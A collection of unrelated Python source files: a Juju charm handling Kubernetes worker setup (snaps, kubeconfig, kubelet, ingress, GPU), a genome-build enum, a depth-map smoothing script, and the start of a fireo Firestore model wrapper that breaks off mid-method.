# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import os
import random
import shutil
import subprocess
import time
from shlex import split
from subprocess import check_call, check_output
from subprocess import CalledProcessError
from socket import gethostname
from charms import layer
from charms.layer import snap
from charms.reactive import hook
from charms.reactive import set_state, remove_state, is_state
from charms.reactive import when, when_any, when_not
from charms.kubernetes.common import get_version
from charms.reactive.helpers import data_changed, any_file_changed
from charms.templating.jinja2 import render
from charmhelpers.core import hookenv, unitdata
from charmhelpers.core.host import service_stop, service_restart
from charmhelpers.contrib.charmsupport import nrpe
# Override the default nagios shortname regex to allow periods, which we
# need because our bin names contain them (e.g. 'snap.foo.daemon'). The
# default regex in charmhelpers doesn't allow periods, but nagios itself does.
nrpe.Check.shortname_re = '[\.A-Za-z0-9-_]+$'
kubeconfig_path = '/root/cdk/kubeconfig'
kubeproxyconfig_path = '/root/cdk/kubeproxyconfig'
kubeclientconfig_path = '/root/.kube/config'
os.environ['PATH'] += os.pathsep + os.path.join(os.sep, 'snap', 'bin')
db = unitdata.kv()
@hook('upgrade-charm')
def upgrade_charm():
# Trigger removal of PPA docker installation if it was previously set.
set_state('config.changed.install_from_upstream')
hookenv.atexit(remove_state, 'config.changed.install_from_upstream')
cleanup_pre_snap_services()
check_resources_for_upgrade_needed()
# Remove the RC for nginx ingress if it exists
if hookenv.config().get('ingress'):
kubectl_success('delete', 'rc', 'nginx-ingress-controller')
# Remove gpu.enabled state so we can reconfigure gpu-related kubelet flags,
# since they can differ between k8s versions
remove_state('kubernetes-worker.gpu.enabled')
remove_state('kubernetes-worker.cni-plugins.installed')
remove_state('kubernetes-worker.config.created')
remove_state('kubernetes-worker.ingress.available')
set_state('kubernetes-worker.restart-needed')
def check_resources_for_upgrade_needed():
hookenv.status_set('maintenance', 'Checking resources')
resources = ['kubectl', 'kubelet', 'kube-proxy']
paths = [hookenv.resource_get(resource) for resource in resources]
if any_file_changed(paths):
set_upgrade_needed()
def set_upgrade_needed():
set_state('kubernetes-worker.snaps.upgrade-needed')
config = hookenv.config()
previous_channel = config.previous('channel')
require_manual = config.get('require-manual-upgrade')
if previous_channel is None or not require_manual:
set_state('kubernetes-worker.snaps.upgrade-specified')
def cleanup_pre_snap_services():
# remove old states
remove_state('kubernetes-worker.components.installed')
# disable old services
services = ['kubelet', 'kube-proxy']
for service in services:
hookenv.log('Stopping {0} service.'.format(service))
service_stop(service)
# cleanup old files
files = [
"/lib/systemd/system/kubelet.service",
"/lib/systemd/system/kube-proxy.service",
"/etc/default/kube-default",
"/etc/default/kubelet",
"/etc/default/kube-proxy",
"/srv/kubernetes",
"/usr/local/bin/kubectl",
"/usr/local/bin/kubelet",
"/usr/local/bin/kube-proxy",
"/etc/kubernetes"
]
for file in files:
if os.path.isdir(file):
hookenv.log("Removing directory: " + file)
shutil.rmtree(file)
elif os.path.isfile(file):
hookenv.log("Removing file: " + file)
os.remove(file)
@when('config.changed.channel')
def channel_changed():
set_upgrade_needed()
@when('kubernetes-worker.snaps.upgrade-needed')
@when_not('kubernetes-worker.snaps.upgrade-specified')
def upgrade_needed_status():
msg = 'Needs manual upgrade, run the upgrade action'
hookenv.status_set('blocked', msg)
@when('kubernetes-worker.snaps.upgrade-specified')
def install_snaps():
check_resources_for_upgrade_needed()
channel = hookenv.config('channel')
hookenv.status_set('maintenance', 'Installing kubectl snap')
snap.install('kubectl', channel=channel, classic=True)
hookenv.status_set('maintenance', 'Installing kubelet snap')
snap.install('kubelet', channel=channel, classic=True)
hookenv.status_set('maintenance', 'Installing kube-proxy snap')
snap.install('kube-proxy', channel=channel, classic=True)
set_state('kubernetes-worker.snaps.installed')
set_state('kubernetes-worker.restart-needed')
remove_state('kubernetes-worker.snaps.upgrade-needed')
remove_state('kubernetes-worker.snaps.upgrade-specified')
@hook('stop')
def shutdown():
''' When this unit is destroyed:
- delete the current node
- stop the worker services
'''
try:
if os.path.isfile(kubeconfig_path):
kubectl('delete', 'node', gethostname().lower())
except CalledProcessError:
hookenv.log('Failed to unregister node.')
service_stop('snap.kubelet.daemon')
service_stop('snap.kube-proxy.daemon')
@when('docker.available')
@when_not('kubernetes-worker.cni-plugins.installed')
def install_cni_plugins():
''' Unpack the cni-plugins resource '''
charm_dir = os.getenv('CHARM_DIR')
# Get the resource via resource_get
try:
resource_name = 'cni-{}'.format(arch())
archive = hookenv.resource_get(resource_name)
except Exception:
message = 'Error fetching the cni resource.'
hookenv.log(message)
hookenv.status_set('blocked', message)
return
if not archive:
hookenv.log('Missing cni resource.')
hookenv.status_set('blocked', 'Missing cni resource.')
return
# Handle null resource publication, we check if filesize < 1mb
filesize = os.stat(archive).st_size
if filesize < 1000000:
hookenv.status_set('blocked', 'Incomplete cni resource.')
return
hookenv.status_set('maintenance', 'Unpacking cni resource.')
unpack_path = '{}/files/cni'.format(charm_dir)
os.makedirs(unpack_path, exist_ok=True)
cmd = ['tar', 'xfvz', archive, '-C', unpack_path]
hookenv.log(cmd)
check_call(cmd)
apps = [
{'name': 'loopback', 'path': '/opt/cni/bin'}
]
for app in apps:
unpacked = '{}/{}'.format(unpack_path, app['name'])
app_path = os.path.join(app['path'], app['name'])
install = ['install', '-v', '-D', unpacked, app_path]
hookenv.log(install)
check_call(install)
# Used by the "registry" action. The action is run on a single worker, but
# the registry pod can end up on any worker, so we need this directory on
# all the workers.
os.makedirs('/srv/registry', exist_ok=True)
set_state('kubernetes-worker.cni-plugins.installed')
@when('kubernetes-worker.snaps.installed')
def set_app_version():
''' Declare the application version to juju '''
cmd = ['kubelet', '--version']
version = check_output(cmd)
hookenv.application_version_set(version.split(b' v')[-1].rstrip())
@when('kubernetes-worker.snaps.installed')
@when_not('kube-control.dns.available')
def notify_user_transient_status():
''' Notify to the user we are in a transient state and the application
is still converging. Potentially remotely, or we may be in a detached loop
wait state '''
# During deployment the worker has to start kubelet without cluster dns
# configured. If this is the first unit online in a service pool waiting
# to self host the dns pod, and configure itself to query the dns service
# declared in the kube-system namespace
hookenv.status_set('waiting', 'Waiting for cluster DNS.')
@when('kubernetes-worker.snaps.installed',
'kube-control.dns.available')
@when_not('kubernetes-worker.snaps.upgrade-needed')
def charm_status(kube_control):
'''Update the status message with the current status of kubelet.'''
update_kubelet_status()
def update_kubelet_status():
''' There are different states that the kubelet can be in, where we are
waiting for dns, waiting for cluster turnup, or ready to serve
applications.'''
services = [
'kubelet',
'kube-proxy'
]
failing_services = []
for service in services:
daemon = 'snap.{}.daemon'.format(service)
if not _systemctl_is_active(daemon):
failing_services.append(service)
if len(failing_services) == 0:
hookenv.status_set('active', 'Kubernetes worker running.')
else:
msg = 'Waiting for {} to start.'.format(','.join(failing_services))
hookenv.status_set('waiting', msg)
def get_ingress_address(relation):
try:
network_info = hookenv.network_get(relation.relation_name)
except NotImplementedError:
network_info = []
if network_info and 'ingress-addresses' in network_info:
# just grab the first one for now, maybe be more robust here?
return network_info['ingress-addresses'][0]
else:
# if they don't have ingress-addresses they are running a juju that
# doesn't support spaces, so just return the private address
return hookenv.unit_get('private-address')
@when('certificates.available', 'kube-control.connected')
def send_data(tls, kube_control):
'''Send the data that is required to create a server certificate for
this server.'''
# Use the public ip of this unit as the Common Name for the certificate.
common_name = hookenv.unit_public_ip()
ingress_ip = get_ingress_address(kube_control)
# Create SANs that the tls layer will add to the server cert.
sans = [
hookenv.unit_public_ip(),
ingress_ip,
gethostname()
]
# Create a path safe name by removing path characters from the unit name.
certificate_name = hookenv.local_unit().replace('/', '_')
# Request a server cert with this information.
tls.request_server_cert(common_name, sans, certificate_name)
@when('kube-api-endpoint.available', 'kube-control.dns.available',
'cni.available')
def watch_for_changes(kube_api, kube_control, cni):
''' Watch for configuration changes and signal if we need to restart the
worker services '''
servers = get_kube_api_servers(kube_api)
dns = kube_control.get_dns()
cluster_cidr = cni.get_config()['cidr']
if (data_changed('kube-api-servers', servers) or
data_changed('kube-dns', dns) or
data_changed('cluster-cidr', cluster_cidr)):
set_state('kubernetes-worker.restart-needed')
@when('kubernetes-worker.snaps.installed', 'kube-api-endpoint.available',
'tls_client.ca.saved', 'tls_client.client.certificate.saved',
'tls_client.client.key.saved', 'tls_client.server.certificate.saved',
'tls_client.server.key.saved',
'kube-control.dns.available', 'kube-control.auth.available',
'cni.available', 'kubernetes-worker.restart-needed',
'worker.auth.bootstrapped')
def start_worker(kube_api, kube_control, auth_control, cni):
''' Start kubelet using the provided API and DNS info.'''
servers = get_kube_api_servers(kube_api)
# Note that the DNS server doesn't necessarily exist at this point. We know
# what its IP will eventually be, though, so we can go ahead and configure
# kubelet with that info. This ensures that early pods are configured with
# the correct DNS even though the server isn't ready yet.
dns = kube_control.get_dns()
ingress_ip = get_ingress_address(kube_control)
cluster_cidr = cni.get_config()['cidr']
if cluster_cidr is None:
hookenv.log('Waiting for cluster cidr.')
return
creds = db.get('credentials')
data_changed('kube-control.creds', creds)
# set --allow-privileged flag for kubelet
set_privileged()
create_config(random.choice(servers), creds)
configure_kubelet(dns, ingress_ip)
configure_kube_proxy(servers, cluster_cidr)
set_state('kubernetes-worker.config.created')
restart_unit_services()
update_kubelet_status()
apply_node_labels()
remove_state('kubernetes-worker.restart-needed')
@when('cni.connected')
@when_not('cni.configured')
def configure_cni(cni):
''' Set worker configuration on the CNI relation. This lets the CNI
subordinate know that we're the worker so it can respond accordingly. '''
cni.set_config(is_master=False, kubeconfig_path=kubeconfig_path)
@when('config.changed.ingress')
def toggle_ingress_state():
''' Ingress is a toggled state. Remove ingress.available if set when
toggled '''
remove_state('kubernetes-worker.ingress.available')
@when('docker.sdn.configured')
def sdn_changed():
'''The Software Defined Network changed on the container so restart the
kubernetes services.'''
restart_unit_services()
update_kubelet_status()
remove_state('docker.sdn.configured')
@when('kubernetes-worker.config.created')
@when_not('kubernetes-worker.ingress.available')
def render_and_launch_ingress():
''' If configuration has ingress daemon set enabled, launch the ingress load
balancer and default http backend. Otherwise attempt deletion. '''
config = hookenv.config()
# If ingress is enabled, launch the ingress controller
if config.get('ingress'):
launch_default_ingress_controller()
else:
hookenv.log('Deleting the http backend and ingress.')
kubectl_manifest('delete',
'/root/cdk/addons/default-http-backend.yaml')
kubectl_manifest('delete',
'/root/cdk/addons/ingress-daemon-set.yaml') # noqa
hookenv.close_port(80)
hookenv.close_port(443)
@when('config.changed.labels', 'kubernetes-worker.config.created')
def apply_node_labels():
''' Parse the labels configuration option and apply the labels to the node.
'''
# scrub and try to format an array from the configuration option
config = hookenv.config()
user_labels = _parse_labels(config.get('labels'))
# For diffing sake, iterate the previous label set
if config.previous('labels'):
previous_labels = _parse_labels(config.previous('labels'))
hookenv.log('previous labels: {}'.format(previous_labels))
else:
# this handles first time run if there is no previous labels config
previous_labels = _parse_labels("")
# Calculate label removal
for label in previous_labels:
if label not in user_labels:
hookenv.log('Deleting node label {}'.format(label))
_apply_node_label(label, delete=True)
# if the label is in user labels we do nothing here, it will get set
# during the atomic update below.
# Atomically set a label
for label in user_labels:
_apply_node_label(label, overwrite=True)
# Set label for application name
_apply_node_label('juju-application={}'.format(hookenv.service_name()),
overwrite=True)
@when_any('config.changed.kubelet-extra-args',
'config.changed.proxy-extra-args')
def extra_args_changed():
set_state('kubernetes-worker.restart-needed')
@when('config.changed.docker-logins')
def docker_logins_changed():
config = hookenv.config()
previous_logins = config.previous('docker-logins')
logins = config['docker-logins']
logins = json.loads(logins)
if previous_logins:
previous_logins = json.loads(previous_logins)
next_servers = {login['server'] for login in logins}
previous_servers = {login['server'] for login in previous_logins}
servers_to_logout = previous_servers - next_servers
for server in servers_to_logout:
cmd = ['docker', 'logout', server]
subprocess.check_call(cmd)
for login in logins:
server = login['server']
username = login['username']
password = login['password']
cmd = ['docker', 'login', server, '-u', username, '-p', password]
subprocess.check_call(cmd)
set_state('kubernetes-worker.restart-needed')
def arch():
'''Return the package architecture as a string. Raise an exception if the
architecture is not supported by kubernetes.'''
# Get the package architecture for this system.
architecture = check_output(['dpkg', '--print-architecture']).rstrip()
# Convert the binary result into a string.
architecture = architecture.decode('utf-8')
return architecture
def create_config(server, creds):
'''Create a kubernetes configuration for the worker unit.'''
# Get the options from the tls-client layer.
layer_options = layer.options('tls-client')
# Get all the paths to the tls information required for kubeconfig.
ca = layer_options.get('ca_certificate_path')
# Create kubernetes configuration in the default location for ubuntu.
create_kubeconfig('/home/ubuntu/.kube/config', server, ca,
token=creds['client_token'], user='ubuntu')
# Make the config dir readable by the ubuntu users so juju scp works.
cmd = ['chown', '-R', 'ubuntu:ubuntu', '/home/ubuntu/.kube']
check_call(cmd)
# Create kubernetes configuration in the default location for root.
create_kubeconfig(kubeclientconfig_path, server, ca,
token=creds['client_token'], user='root')
# Create kubernetes configuration for kubelet, and kube-proxy services.
create_kubeconfig(kubeconfig_path, server, ca,
token=creds['kubelet_token'], user='kubelet')
create_kubeconfig(kubeproxyconfig_path, server, ca,
token=creds['proxy_token'], user='kube-proxy')
def parse_extra_args(config_key):
elements = hookenv.config().get(config_key, '').split()
args = {}
for element in elements:
if '=' in element:
key, _, value = element.partition('=')
args[key] = value
else:
args[element] = 'true'
return args
def configure_kubernetes_service(service, base_args, extra_args_key):
db = unitdata.kv()
prev_args_key = 'kubernetes-worker.prev_args.' + service
prev_args = db.get(prev_args_key) or {}
extra_args = parse_extra_args(extra_args_key)
args = {}
for arg in prev_args:
# remove previous args by setting to null
args[arg] = 'null'
for k, v in base_args.items():
args[k] = v
for k, v in extra_args.items():
args[k] = v
cmd = ['snap', 'set', service] + ['%s=%s' % item for item in args.items()]
check_call(cmd)
db.set(prev_args_key, args)
def configure_kubelet(dns, ingress_ip):
layer_options = layer.options('tls-client')
ca_cert_path = layer_options.get('ca_certificate_path')
server_cert_path = layer_options.get('server_certificate_path')
server_key_path = layer_options.get('server_key_path')
kubelet_opts = {}
kubelet_opts['require-kubeconfig'] = 'true'
kubelet_opts['kubeconfig'] = kubeconfig_path
kubelet_opts['network-plugin'] = 'cni'
kubelet_opts['v'] = '0'
kubelet_opts['address'] = '0.0.0.0'
kubelet_opts['port'] = '10250'
kubelet_opts['cluster-domain'] = dns['domain']
kubelet_opts['anonymous-auth'] = 'false'
kubelet_opts['client-ca-file'] = ca_cert_path
kubelet_opts['tls-cert-file'] = server_cert_path
kubelet_opts['tls-private-key-file'] = server_key_path
kubelet_opts['logtostderr'] = 'true'
kubelet_opts['fail-swap-on'] = 'false'
kubelet_opts['node-ip'] = ingress_ip
if (dns['enable-kube-dns']):
kubelet_opts['cluster-dns'] = dns['sdn-ip']
privileged = is_state('kubernetes-worker.privileged')
kubelet_opts['allow-privileged'] = 'true' if privileged else 'false'
if is_state('kubernetes-worker.gpu.enabled'):
if get_version('kubelet') < (1, 6):
hookenv.log('Adding --experimental-nvidia-gpus=1 to kubelet')
kubelet_opts['experimental-nvidia-gpus'] = '1'
else:
hookenv.log('Adding --feature-gates=Accelerators=true to kubelet')
kubelet_opts['feature-gates'] = 'Accelerators=true'
configure_kubernetes_service('kubelet', kubelet_opts, 'kubelet-extra-args')
def configure_kube_proxy(api_servers, cluster_cidr):
kube_proxy_opts = {}
kube_proxy_opts['cluster-cidr'] = cluster_cidr
kube_proxy_opts['kubeconfig'] = kubeproxyconfig_path
kube_proxy_opts['logtostderr'] = 'true'
kube_proxy_opts['v'] = '0'
kube_proxy_opts['master'] = random.choice(api_servers)
if b'lxc' in check_output('virt-what', shell=True):
kube_proxy_opts['conntrack-max-per-core'] = '0'
configure_kubernetes_service('kube-proxy', kube_proxy_opts,
'proxy-extra-args')
def create_kubeconfig(kubeconfig, server, ca, key=None, certificate=None,
user='ubuntu', context='juju-context',
cluster='juju-cluster', password=None, token=None):
'''Create a configuration for Kubernetes based on path using the supplied
arguments for values of the Kubernetes server, CA, key, certificate, user
context and cluster.'''
if not key and not certificate and not password and not token:
raise ValueError('Missing authentication mechanism.')
# token and password are mutually exclusive. Error early if both are
# present. The developer has requested an impossible situation.
# see: kubectl config set-credentials --help
if token and password:
raise ValueError('Token and Password are mutually exclusive.')
# Create the config file with the address of the master server.
cmd = 'kubectl config --kubeconfig={0} set-cluster {1} ' \
'--server={2} --certificate-authority={3} --embed-certs=true'
check_call(split(cmd.format(kubeconfig, cluster, server, ca)))
# Delete old users
cmd = 'kubectl config --kubeconfig={0} unset users'
check_call(split(cmd.format(kubeconfig)))
# Create the credentials using the client flags.
cmd = 'kubectl config --kubeconfig={0} ' \
'set-credentials {1} '.format(kubeconfig, user)
if key and certificate:
cmd = '{0} --client-key={1} --client-certificate={2} '\
'--embed-certs=true'.format(cmd, key, certificate)
if password:
cmd = "{0} --username={1} --password={2}".format(cmd, user, password)
# This is mutually exclusive from password. They will not work together.
if token:
cmd = "{0} --token={1}".format(cmd, token)
check_call(split(cmd))
# Create a default context with the cluster.
cmd = 'kubectl config --kubeconfig={0} set-context {1} ' \
'--cluster={2} --user={3}'
check_call(split(cmd.format(kubeconfig, context, cluster, user)))
# Make the config use this new context.
cmd = 'kubectl config --kubeconfig={0} use-context {1}'
check_call(split(cmd.format(kubeconfig, context)))
@when_any('config.changed.default-backend-image',
'config.changed.nginx-image')
@when('kubernetes-worker.config.created')
def launch_default_ingress_controller():
''' Launch the Kubernetes ingress controller & default backend (404) '''
config = hookenv.config()
# need to test this in case we get in
# here from a config change to the image
if not config.get('ingress'):
return
context = {}
context['arch'] = arch()
addon_path = '/root/cdk/addons/{}'
context['defaultbackend_image'] = config.get('default-backend-image')
if (context['defaultbackend_image'] == "" or
context['defaultbackend_image'] == "auto"):
if context['arch'] == 's390x':
context['defaultbackend_image'] = \
"gcr.io/google_containers/defaultbackend-s390x:1.4"
else:
context['defaultbackend_image'] = \
"gcr.io/google_containers/defaultbackend:1.4"
# Render the default http backend (404) replicationcontroller manifest
manifest = addon_path.format('default-http-backend.yaml')
render('default-http-backend.yaml', manifest, context)
hookenv.log('Creating the default http backend.')
try:
kubectl('apply', '-f', manifest)
except CalledProcessError as e:
hookenv.log(e)
hookenv.log('Failed to create default-http-backend. Will attempt again next update.') # noqa
hookenv.close_port(80)
hookenv.close_port(443)
return
# Render the ingress daemon set controller manifest
context['ingress_image'] = config.get('nginx-image')
if context['ingress_image'] == "" or context['ingress_image'] == "auto":
if context['arch'] == 's390x':
context['ingress_image'] = \
"docker.io/cdkbot/nginx-ingress-controller-s390x:0.9.0-beta.13"
else:
context['ingress_image'] = \
"gcr.io/google_containers/nginx-ingress-controller:0.9.0-beta.15" # noqa
context['juju_application'] = hookenv.service_name()
manifest = addon_path.format('ingress-daemon-set.yaml')
render('ingress-daemon-set.yaml', manifest, context)
hookenv.log('Creating the ingress daemon set.')
try:
kubectl('apply', '-f', manifest)
except CalledProcessError as e:
hookenv.log(e)
hookenv.log('Failed to create ingress controller. Will attempt again next update.') # noqa
hookenv.close_port(80)
hookenv.close_port(443)
return
set_state('kubernetes-worker.ingress.available')
hookenv.open_port(80)
hookenv.open_port(443)
def restart_unit_services():
'''Restart worker services.'''
hookenv.log('Restarting kubelet and kube-proxy.')
services = ['kube-proxy', 'kubelet']
for service in services:
service_restart('snap.%s.daemon' % service)
def get_kube_api_servers(kube_api):
'''Return the kubernetes api server address and port for this
relationship.'''
hosts = []
# Iterate over every service from the relation object.
for service in kube_api.services():
for unit in service['hosts']:
hosts.append('https://{0}:{1}'.format(unit['hostname'],
unit['port']))
return hosts
def kubectl(*args):
''' Run a kubectl cli command with a config file. Returns stdout and throws
an error if the command fails. '''
command = ['kubectl', '--kubeconfig=' + kubeclientconfig_path] + list(args)
hookenv.log('Executing {}'.format(command))
return check_output(command)
def kubectl_success(*args):
''' Runs kubectl with the given args. Returns True if succesful, False if
not. '''
try:
kubectl(*args)
return True
except CalledProcessError:
return False
def kubectl_manifest(operation, manifest):
''' Wrap the kubectl creation command when using filepath resources
:param operation - one of get, create, delete, replace
:param manifest - filepath to the manifest
'''
# Deletions are a special case
if operation == 'delete':
# Ensure we immediately remove requested resources with --now
return kubectl_success(operation, '-f', manifest, '--now')
else:
# Guard against an error re-creating the same manifest multiple times
if operation == 'create':
# If we already have the definition, its probably safe to assume
# creation was true.
if kubectl_success('get', '-f', manifest):
hookenv.log('Skipping definition for {}'.format(manifest))
return True
# Execute the requested command that did not match any of the special
# cases above
return kubectl_success(operation, '-f', manifest)
@when('nrpe-external-master.available')
@when_not('nrpe-external-master.initial-config')
def initial_nrpe_config(nagios=None):
set_state('nrpe-external-master.initial-config')
update_nrpe_config(nagios)
@when('kubernetes-worker.config.created')
@when('nrpe-external-master.available')
@when_any('config.changed.nagios_context',
'config.changed.nagios_servicegroups')
def update_nrpe_config(unused=None):
services = ('snap.kubelet.daemon', 'snap.kube-proxy.daemon')
hostname = nrpe.get_nagios_hostname()
current_unit = nrpe.get_nagios_unit_name()
nrpe_setup = nrpe.NRPE(hostname=hostname)
nrpe.add_init_service_checks(nrpe_setup, services, current_unit)
nrpe_setup.write()
@when_not('nrpe-external-master.available')
@when('nrpe-external-master.initial-config')
def remove_nrpe_config(nagios=None):
remove_state('nrpe-external-master.initial-config')
# List of systemd services for which the checks will be removed
services = ('snap.kubelet.daemon', 'snap.kube-proxy.daemon')
# The current nrpe-external-master interface doesn't handle a lot of logic,
# use the charm-helpers code for now.
hostname = nrpe.get_nagios_hostname()
nrpe_setup = nrpe.NRPE(hostname=hostname)
for service in services:
nrpe_setup.remove_check(shortname=service)
def set_privileged():
"""Update the allow-privileged flag for kubelet.
"""
privileged = hookenv.config('allow-privileged')
if privileged == 'auto':
gpu_enabled = is_state('kubernetes-worker.gpu.enabled')
privileged = 'true' if gpu_enabled else 'false'
if privileged == 'true':
set_state('kubernetes-worker.privileged')
else:
remove_state('kubernetes-worker.privileged')
@when('config.changed.allow-privileged')
@when('kubernetes-worker.config.created')
def on_config_allow_privileged_change():
"""React to changed 'allow-privileged' config value.
"""
set_state('kubernetes-worker.restart-needed')
remove_state('config.changed.allow-privileged')
@when('cuda.installed')
@when('kubernetes-worker.config.created')
@when_not('kubernetes-worker.gpu.enabled')
def enable_gpu():
"""Enable GPU usage on this node.
"""
config = hookenv.config()
if config['allow-privileged'] == "false":
hookenv.status_set(
'active',
'GPUs available. Set allow-privileged="auto" to enable.'
)
return
hookenv.log('Enabling gpu mode')
try:
# Not sure why this is necessary, but if you don't run this, k8s will
# think that the node has 0 gpus (as shown by the output of
# `kubectl get nodes -o yaml`
check_call(['nvidia-smi'])
except CalledProcessError as cpe:
hookenv.log('Unable to communicate with the NVIDIA driver.')
hookenv.log(cpe)
return
# Apply node labels
_apply_node_label('gpu=true', overwrite=True)
_apply_node_label('cuda=true', overwrite=True)
set_state('kubernetes-worker.gpu.enabled')
set_state('kubernetes-worker.restart-needed')
@when('kubernetes-worker.gpu.enabled')
@when_not('kubernetes-worker.privileged')
@when_not('kubernetes-worker.restart-needed')
def disable_gpu():
"""Disable GPU usage on this node.
This handler fires when we're running in gpu mode, and then the operator
sets allow-privileged="false". Since we can no longer run privileged
containers, we need to disable gpu mode.
"""
hookenv.log('Disabling gpu mode')
# Remove node labels
_apply_node_label('gpu', delete=True)
_apply_node_label('cuda', delete=True)
remove_state('kubernetes-worker.gpu.enabled')
set_state('kubernetes-worker.restart-needed')
@when('kubernetes-worker.gpu.enabled')
@when('kube-control.connected')
def notify_master_gpu_enabled(kube_control):
"""Notify kubernetes-master that we're gpu-enabled.
"""
kube_control.set_gpu(True)
@when_not('kubernetes-worker.gpu.enabled')
@when('kube-control.connected')
def notify_master_gpu_not_enabled(kube_control):
"""Notify kubernetes-master that we're not gpu-enabled.
"""
kube_control.set_gpu(False)
@when('kube-control.connected')
def request_kubelet_and_proxy_credentials(kube_control):
""" Request kubelet node authorization with a well formed kubelet user.
This also implies that we are requesting kube-proxy auth. """
# The kube-cotrol interface is created to support RBAC.
# At this point we might as well do the right thing and return the hostname
# even if it will only be used when we enable RBAC
nodeuser = 'system:node:{}'.format(gethostname().lower())
kube_control.set_auth_request(nodeuser)
@when('kube-control.connected')
def catch_change_in_creds(kube_control):
"""Request a service restart in case credential updates were detected."""
nodeuser = 'system:node:{}'.format(gethostname().lower())
creds = kube_control.get_auth_credentials(nodeuser)
if creds \
and data_changed('kube-control.creds', creds) \
and creds['user'] == nodeuser:
# We need to cache the credentials here because if the
# master changes (master leader dies and replaced by a new one)
# the new master will have no recollection of our certs.
db.set('credentials', creds)
set_state('worker.auth.bootstrapped')
set_state('kubernetes-worker.restart-needed')
@when_not('kube-control.connected')
def missing_kube_control():
"""Inform the operator they need to add the kube-control relation.
If deploying via bundle this won't happen, but if operator is upgrading a
a charm in a deployment that pre-dates the kube-control relation, it'll be
missing.
"""
hookenv.status_set(
'blocked',
'Relate {}:kube-control kubernetes-master:kube-control'.format(
hookenv.service_name()))
@when('docker.ready')
def fix_iptables_for_docker_1_13():
""" Fix iptables FORWARD policy for Docker >=1.13
https://github.com/kubernetes/kubernetes/issues/40182
https://github.com/kubernetes/kubernetes/issues/39823
"""
cmd = ['iptables', '-w', '300', '-P', 'FORWARD', 'ACCEPT']
check_call(cmd)
def _systemctl_is_active(application):
''' Poll systemctl to determine if the application is running '''
cmd = ['systemctl', 'is-active', application]
try:
raw = check_output(cmd)
return b'active' in raw
except Exception:
return False
class GetNodeNameFailed(Exception):
pass
def get_node_name():
# Get all the nodes in the cluster
cmd = 'kubectl --kubeconfig={} get no -o=json'.format(kubeconfig_path)
cmd = cmd.split()
deadline = time.time() + 60
while time.time() < deadline:
try:
raw = check_output(cmd)
break
except CalledProcessError:
hookenv.log('Failed to get node name for node %s.'
' Will retry.' % (gethostname()))
time.sleep(1)
else:
msg = 'Failed to get node name for node %s' % gethostname()
raise GetNodeNameFailed(msg)
result = json.loads(raw.decode('utf-8'))
if 'items' in result:
for node in result['items']:
if 'status' not in node:
continue
if 'addresses' not in node['status']:
continue
# find the hostname
for address in node['status']['addresses']:
if address['type'] == 'Hostname':
if address['address'] == gethostname():
return node['metadata']['name']
# if we didn't match, just bail to the next node
break
msg = 'Failed to get node name for node %s' % gethostname()
raise GetNodeNameFailed(msg)
class ApplyNodeLabelFailed(Exception):
pass
def _apply_node_label(label, delete=False, overwrite=False):
''' Invoke kubectl to apply node label changes '''
nodename = get_node_name()
# TODO: Make this part of the kubectl calls instead of a special string
cmd_base = 'kubectl --kubeconfig={0} label node {1} {2}'
if delete is True:
label_key = label.split('=')[0]
cmd = cmd_base.format(kubeconfig_path, nodename, label_key)
cmd = cmd + '-'
else:
cmd = cmd_base.format(kubeconfig_path, nodename, label)
if overwrite:
cmd = '{} --overwrite'.format(cmd)
cmd = cmd.split()
deadline = time.time() + 60
while time.time() < deadline:
code = subprocess.call(cmd)
if code == 0:
break
hookenv.log('Failed to apply label %s, exit code %d. Will retry.' % (
label, code))
time.sleep(1)
else:
msg = 'Failed to apply label %s' % label
raise ApplyNodeLabelFailed(msg)
def _parse_labels(labels):
''' Parse labels from a key=value string separated by space.'''
label_array = labels.split(' ')
sanitized_labels = []
for item in label_array:
if '=' in item:
sanitized_labels.append(item)
else:
hookenv.log('Skipping malformed option: {}'.format(item))
return sanitized_labels
|
the-stack_0_12326 | from enum import Enum
class GenomeBuild(Enum):
GRCH37 = 0
GRCH38 = 1
MM9 = 2
MM10 = 3
RN6 = 4
@staticmethod
def parse(s: str) -> "GenomeBuild":
if s == "GRCh37":
return GenomeBuild.GRCH37
elif s == "GRCh38":
return GenomeBuild.GRCH38
elif s == "mm9":
return GenomeBuild.MM9
elif s == "mm10":
return GenomeBuild.MM10
elif s == "rn6":
return GenomeBuild.RN6
else:
raise ValueError("invalid genome build: '{}'".format(s))
def __str__(self) -> str:
if self == GenomeBuild.GRCH37:
return "GRCh37"
elif self == GenomeBuild.GRCH38:
return "GRCh38"
elif self == GenomeBuild.MM9:
return "mm9"
elif self == GenomeBuild.MM10:
return "mm10"
elif self == GenomeBuild.RN6:
return "rn6"
else:
raise ValueError("unreachable")
|
the-stack_0_12327 | import os
import cv2
import numpy as np
import tqdm
from common import my_utils
def improve_depth(image, depth, threshold=0.001, threshold_faraway_planes=False):
window_size = 20
width = image.shape[0]
height = image.shape[1]
if threshold_faraway_planes:
# NOTE: This could be PERHAPS useful for cases where the depth map is really bad / inexistent
# for faraway planes; unchanging neighborhood in depth image sometimes means no data which,
# generally, means too close or too far for measurement; this is dangerous and should probably be done offline
for i in range(0, width - window_size, window_size // 5):
for j in range(0, height - window_size, window_size // 5):
patch = image[i:i + window_size, j:j + window_size]
if np.std(patch) < threshold:
depth[i:i + window_size, j:j + window_size] = 300
depth = cv2.GaussianBlur(depth, (7, 7), 1)
return depth
def process_all(images_path, depth_path, output_path):
img_names = my_utils.os_listdir(images_path)
depth_names = my_utils.os_listdir(depth_path)
beta = 0
pbar = tqdm.tqdm(total=len(img_names))
for name_file, depth_file in zip(img_names, depth_names):
pbar.update(1)
img = cv2.imread(os.path.join(images_path, name_file))
gray_img = cv2.cvtColor(img, cv2.COLOR_BGRA2GRAY)
# divided by 256 to convert it into metres
original_depth = cv2.imread(os.path.join(depth_path, depth_file), cv2.IMREAD_UNCHANGED) / 256
smooth_depth = improve_depth(gray_img, original_depth, threshold=beta)
np.save(os.path.join(output_path, name_file), smooth_depth)
|
the-stack_0_12328 | from fireo.fields import ReferenceField, NestedModel, IDField
from fireo.queries import errors
from fireo.utils import utils
from google.cloud import firestore
class ModelWrapper:
"""Convert query result into Model instance"""
@classmethod
def from_query_result(cls, model, doc, nested_doc=False):
parent_key = None
if nested_doc:
doc_dict = doc
elif doc:
parent_key = utils.get_parent_doc(doc.reference.path)
if doc.to_dict() is not None:
doc_dict = doc.to_dict()
else:
return None
else:
return None
# instance values is changed according to firestore
# so mark it modified this will help later for figuring
# out the updated fields when need to update this document
